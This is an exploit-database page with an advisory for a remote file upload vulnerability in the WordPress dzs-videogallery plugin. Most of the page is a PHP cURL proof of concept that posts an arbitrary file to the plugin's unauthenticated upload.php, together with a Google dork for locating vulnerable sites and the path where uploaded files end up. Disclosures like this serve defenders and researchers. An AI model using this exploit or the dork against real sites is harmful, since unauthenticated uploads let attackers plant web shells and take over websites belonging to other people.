WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

2013.12.02
Credit: iskorpitx
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##### # Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability # Author: iskorpitx # Date: 22/11/2013 # Vendor Homepage: http://digitalzoomstudio.net # Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/ # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-videogallery/ # Tested on : Windows/Linux ##### <?php $uploadfile=""; $ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file_field'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top